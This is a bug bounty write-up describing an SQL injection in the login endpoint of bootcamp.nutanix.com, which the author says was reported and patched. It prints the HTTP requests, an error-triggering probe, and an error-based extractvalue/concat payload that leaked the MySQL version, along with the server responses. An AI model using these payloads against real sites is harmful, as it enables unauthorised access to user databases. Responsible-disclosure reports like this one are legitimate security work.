SQL Injection Vulnerability in bootcamp.nutanix.com | Bug Bounty POC

Hey Guys,


So, another concise report about an SQLi I recently found. One day I was just going through some Twitter posts and saw one of my friends reply to a tweet about a swag pack.


As some of you already know how attractive such tweets are, I decided to test the site that gave him that awesome swag pack.


While scanning subdomains I saw an interesting one, http://bootcamp.nutanix.com/, and it had a login page.


At first I tried different combinations to see if I could get access to the panel, but I wasn't that lucky and didn't find anything.... So I decided to see if any other vulnerability existed that I could use to log in or to get some sensitive information from the site.

So I fired up Burp, sent a random email and password, and captured the request. It was similar to this:


POST /bootcamp/login HTTP/1.1
Content-Type: application/json
Content-Length: 74
Referer: https://bootcamp.nutanix.com/
Host: bootcamp.nutanix.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


{"email":"Email@email.com","password":"passwordlol"}


The response to this was "Invalid Username and Password". Then I started monitoring the response of the request in Burp Repeater whenever I changed something in it. At first I thought of getting an SQLi in the headers, but that didn't work. Then I added a simple 1'\ to the email field, and the response to this request was different from all the others: it was a 500 Internal Server Error. The same error appeared when I put this in the password parameter, because that was also vulnerable.

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 301
ETag: W/"12d-ZLo463k+S1SW5Z9MTAnhrr4EGvI"
Date: Mon, 16 Jul 2018 18:20:13 GMT
Connection: keep-alive


{"code":"ER_PARSE_ERROR","errno":1064,"sqlMessage":"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\"' at line 1","sqlState":"42000","index":0,"sql":"SELECT id from Users WHERE email=\"1'\"\" AND password=\"'\""}


This was indeed a surprise for me, and it was also fun to see the error after so many tries. The next part was to see whether the SQLi was exploitable any further or not.


POST /bootcamp/login HTTP/1.1
Content-Type: application/json
Content-Length: 74
Referer: https://bootcamp.nutanix.com/
Host: bootcamp.nutanix.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


{"email":"a\"and(extractvalue(1,concat(0x0a,@@version)))#","password":"'"}

and this gave the output I expected:

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 227
ETag: W/"e3-FF7tF7d8MmsLPb6vtq6tjDeVHHk"
Date: Mon, 16 Jul 2018 18:23:09 GMT
Connection: keep-alive


{"code":"ER_UNKNOWN_ERROR","errno":1105,"sqlMessage":"XPATH syntax error: '\n8.0.11'","sqlState":"HY000","index":0,"sql":"SELECT id from Users WHERE email=\"a\"and(extractvalue(1,concat(0x0a,@@version)))#\" AND password=\"'\""}


At this point most people would report the issue, but I thought I should test a bit further to show a better PoC than this one, so here's another screenshot that I used to check it manually.


At this point I simply put the POST request into sqlmap, and the output was:


I reported this issue to the security team at security@nutanix.com and they quickly patched it, and yayyyyeeee, I was awarded an awesome swag pack that is still in transit xD. Also special thanks to Mani Sir, he always helps me whenever I need help or guidance with something 👌


Thanks for Reading Guys 🙂

About the Author

Muhammad Khizer Javed

Ethical Hacker, Bug Bounty Hunter/ Pentester & Gamer
